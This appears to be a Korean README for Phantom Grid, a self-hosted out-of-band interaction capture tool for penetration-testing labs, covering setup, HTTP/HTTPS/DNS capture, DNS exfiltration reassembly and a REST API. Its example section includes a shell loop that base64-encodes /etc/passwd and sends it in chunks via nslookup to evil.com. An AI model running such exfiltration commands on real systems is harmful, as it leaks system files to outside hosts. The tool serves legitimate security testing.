
무료 Burp Collaborator 대안 - SQLite 및 유출 재조립을 통한 OOB 상호작용 캡처(HTTP/HTTPS/DNS)
침투 테스트 랩을 위한 무료 오픈소스 Burp Collaborator 대안
Out-of-Band (OOB) 상호작용 캡처 · HTTP/HTTPS · DNS · SQLite · 유출 데이터 재조립
Phantom Grid는 자체 호스팅 OOB(Out-of-Band) 상호작용 캡처 도구로, 침투 테스트 랩(PortSwigger Web Security Academy, HackTheBox, TryHackMe 등)을 해결하기 위한 Burp Collaborator의 무료 대안입니다.
| 기능 | 설명 |
|---|---|
| HTTP + HTTPS 캡처 | 자동 생성된 자체 서명 TLS 인증서를 사용하는 듀얼 스택 |
| DNS 캡처 | 포트 53에서 내장 DNS 서버 |
| DNS 유출 재조립 | 다중 파트 DNS 유출로부터 자동 청크 재조립 |
| SQLite 영속성 | 모든 데이터가 서버 재시작 후에도 유지됨 (성능을 위한 WAL 모드) |
| 40개 이상의 페이로드 템플릿 | SSRF, XXE, SQLi OOB, CMDi, SSTI, DNS 유출 — 바로 복사 가능 |
| 전술 대시보드 | 실시간 모니터링이 포함된 지휘 센터 UI |
| Docker 지원 | 한 명령으로 배포 |
| REST API | 전체 토큰/상호작용/유출 관리 API |
git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt
# HTTP only
python server/server.py
# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https
# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns
git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d
python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads
┌──────────────────────────────────────────────────────────────┐
│ PHANTOM GRID v2.0 │
│ │
│ ┌─────────────┐ ┌─────────────────────────────────┐ │
│ │ Dashboard │─API─▶│ Flask Server │ │
│ │ (React) │ │ │ │
│ └─────────────┘ │ :9090 HTTP capture + API │ │
│ │ :9443 HTTPS capture + API │ │
│ ┌─────────────┐ │ :53 DNS capture │ │
│ │ Target App │─────▶│ │ │
│ └─────────────┘ └──────────┬──────────────────────┘ │
│ │ │
│ ┌──────────▼──────────┐ │
│ │ SQLite Database │ │
│ │ phantom_grid.db │ │
│ │ │ │
│ │ tokens │ │
│ │ interactions │ │
│ │ dns_exfil_sessions │ │
│ │ dns_exfil_chunks │ │
│ └─────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────┘
최신 애플리케이션은 종종 혼합 콘텐츠 요청(https:// 페이지에서 http://)을 차단합니다. Phantom Grid v2.0은 HTTP와 함께 HTTPS를 실행합니다.
python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443
python server/server.py --https \
--cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
--key /etc/letsencrypt/live/yourdomain/privkey.pem
python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically
Phantom Grid는 청크된 DNS 유출 데이터를 자동으로 재조립합니다. 이는 여러 DNS 조회에 걸쳐 분할되어야 하는 대용량 페이로드(레이블은 63바이트로 제한됨)를 추출하는 데 중요합니다.
| 형식 | 예시 | 사용 사례 |
|---|---|---|
| 단순 | data.TOKEN.domain | 단일 값 유출 |
| 인덱스 | 0.chunk1.TOKEN.domain | 자동 세션, 순서가 지정된 청크 |
| 태그 | sess1.0.chunk1.TOKEN.domain | 순서가 지정된 이름 있는 세션 |
| 종료 신호 | end.sess1.TOKEN.domain | 세션 완료 표시 |
/etc/passwd 유출대상에서:
# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
chunk=$(echo "$data" | cut -c1-50)
data=$(echo "$data" | cut -c51-)
nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1
재조립된 데이터 보기:
curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil
응답:
[{
"session_tag": "exfil",
"completed": 1,
"chunk_count": 12,
"reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]
모든 데이터는 동시 읽기/쓰기 성능을 위해 SQLite WAL 모드를 사용하여 phantom_grid.db에 저장됩니다.
phantom_grid.db
├── tokens — Token metadata
├── interactions — All HTTP/DNS captures
├── dns_exfil_sessions — Grouped exfil sessions
└── dns_exfil_chunks — Individual exfil data chunks
데이터는 서버 재시작 후에도 유지됩니다. phantom_grid.db를 복사하여 백업하세요.
| 메서드 | 엔드포인트 | 설명 |
|---|---|---|
GET | /api/tokens | 통계와 함께 모든 토큰 나열 |
POST | /api/tokens | 토큰 생성 {"label": "...", "notes": "..."} |
PATCH | /api/tokens/<id> | 토큰 레이블/노트 업데이트 |
DELETE | /api/tokens/<id> | 토큰 + 모든 데이터 삭제 (CASCADE) |
| 메서드 | 엔드포인트 | 설명 |
|---|---|---|
GET | /api/tokens/<id>/interactions?limit=&offset= | 토큰 상호작용 가져오기 |
DELETE | /api/tokens/<id>/interactions | 상호작용 지우기 |
GET | /api/log?limit= | 전역 로그 (모든 토큰) |
GET | /api/poll?since=<ISO> | 새 상호작용 폴링 |
| 메서드 | 엔드포인트 | 설명 |
|---|---|---|
GET | /api/tokens/<id>/exfil | 재조립된 데이터와 함께 유출 세션 가져오기 |
| 메서드 | 엔드포인트 | 설명 |
|---|---|---|
GET | /api/stats | 전역 통계 (개수, DB 크기) |
GET | /health | 상태 확인 |
| 프로토콜 | 엔드포인트 |
|---|---|
| HTTP | http://server:9090/c/<TOKEN> |
| HTTPS | https://server:9443/c/<TOKEN> |
| DNS | <TOKEN>.yourdomain.com |
| DNS 유출 | <data>.<TOKEN>.yourdomain.com |
python server.py [OPTIONS]
--port N HTTP port (default: 9090)
--https Enable HTTPS server
--https-port N HTTPS port (default: 9443)
--cert PATH Custom TLS certificate (PEM)
--key PATH Custom TLS key file
--dns Enable DNS capture server
--dns-port N DNS port (default: 53)
--dns-ip IP IP returned in DNS responses (default: 127.0.0.1)
--db PATH SQLite database path (default: phantom_grid.db)
| 기능 | Burp Collaborator | Interactsh | Phantom Grid |
|---|---|---|---|
| 가격 | Burp Pro ($$$) | 무료 | 무료 |
| HTTP/HTTPS | ✅ | ✅ | ✅ |
| DNS 캡처 | ✅ | ✅ | ✅ |
| DNS 유출 재조립 | ❌ | ❌ | ✅ |
| SMTP 캡처 | ✅ | ✅ | ❌ (로드맵) |
| 자체 호스팅 | ❌ | ✅ | ✅ |
| 사용자 지정 도메인 | ❌ | ✅ | ✅ |
| 영구 저장소 | N/A | ❌ | ✅ (SQLite) |
| 대시보드 UI | Burp Suite | CLI | 웹 UI |
| 페이로드 템플릿 | ❌ | ❌ | ✅ (40개 이상) |
대시보드에는 40개 이상의 바로 복사 가능한 페이로드가 포함되어 있습니다: